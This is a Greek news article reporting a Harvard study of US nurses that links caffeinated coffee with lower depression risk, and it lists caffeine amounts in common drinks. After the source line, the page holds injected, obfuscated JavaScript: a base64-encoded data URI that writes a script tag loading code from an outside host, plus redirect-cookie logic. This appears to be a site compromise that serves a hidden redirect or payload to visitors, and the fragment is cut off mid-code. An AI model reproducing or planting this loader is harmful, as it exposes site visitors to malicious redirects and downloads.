Ο καφές προστατεύει από την κατάθλιψη

Οι γυναίκες που πίνουν δύο ή περισσότερα φλιτζάνια καφέ την ημέρα, διατρέχουν μειωμένο κίνδυνο να εκδηλώσουν κατάθλιψη, σύμφωνα με μία νέα μελέτη.

Αν και παραμένει άγνωστο που ακριβώς οφείλεται η προστατευτική δράση του καφέ, οι ερευνητές εκτιμούν πως το κλειδί πρέπει να είναι η καφεΐνη, καθώς ο ντεκαφεϊνέ καφές δεν φάνηκε να μειώνει τον κίνδυνο.

Τα νέα ευρήματα, που δημοσιεύονται στην επιθεώρηση «Archives of Internal Medicine», προέρχονται από μελέτη σε περισσότερες από 50.000 νοσηλεύτριες από τις ΗΠΑ.

Ερευνητές από την Ιατρική Σχολή του Πανεπιστημίου Χάρβαρντ παρακολούθησαν επί μία δεκαετία τις γυναίκες αυτές, ζητώντας τους σε τακτά χρονικά διαστήματα να καταγράφουν την κατανάλωση καφέ.

Λίγο περισσότερες από 2.600 γυναίκες ανέπτυξαν κατάθλιψη στη διάρκεια της δεκαετίας. Οι περισσότερες έπιναν σπανίως έως καθόλου καφέ.

Σε σύγκριση με όσες έπιναν ένα φλιτζάνι καφέ με καφεΐνη την εβδομάδα ή λιγότερο, όσες έπιναν δύο ή τρία την ημέρα είχαν κατά 15% λιγότερες πιθανότητες κατάθλιψης, ενώ όσες έπιναν τέσσερις ή περισσότερους καφέδες την ημέρα είχαν 20% λιγότερες πιθανότητες κατάθλιψης.

Προγενέστερες μελέτες έχουν συσχετίσει την καθημερινή κατανάλωση καφέ με μειωμένα ποσοστά αυτοκτονιών και οι ερευνητές του Χάρβαρντ εικάζουν πως τόσο αυτά τα ευρήματα, όσο και τα δικά τους οφείλονται στο ότι η καφεΐνη διεγείρει τα αισθήματα της ευεξίας και της ενεργητικότητας.

Μια άλλη πιθανή εξήγηση είναι πως όσοι είναι κακοδιάθετοι αποφεύγουν τον καφέ, για να μην ενταθούν οι διαταραχές ύπνου που κατά κανόνα έχουν και οι οποίες μπορεί να επηρεαστούν από την διεγερτική δράση της καφεΐνης.

Η πολλή καφεΐνη εξάλλου μπορεί να αυξήσει και τα συμπτώματα άγχους.

Περί καφεΐνης

Αν και δεν υπάρχουν συστάσεις για την ποσότητα της καφεΐνης που μπορεί κανείς με ασφάλεια να καταναλώνει καθημερινά, στις εγκύους συνιστάται να περιορίζεται η κατανάλωσή της σε λιγότερα από 200 mg την ημέρα.

Η ενημερωτική ιστοσελίδα του βρετανικού Εθνικού Συστήματος Υγείας (NHSChoices) αναφέρει τις εξής περιεκτικότητες ροφημάτων και τροφίμων σε καφεΐνη:

* Ένα φλιτζάνι στιγμιαίος καφές: 100 mg

* Ένα φλιτζάνια καφές φίλτρου: 140 mg

* Ένα φλιτζάνι τσάι: 75 mg

* Ένα κουτάκι αναψυκτικό τύπου κόλα: 40 mg

* Μία μπάρα των 50 γρ. σοκολάτας γάλακτος: περίπου 25 mg

Πηγή : Web Only
quot;));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

You may also like...

Leave a Reply